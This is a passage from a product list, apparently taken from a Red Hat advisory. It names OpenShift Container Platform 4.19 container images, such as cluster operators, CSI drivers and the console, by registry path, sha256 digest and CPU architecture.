"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
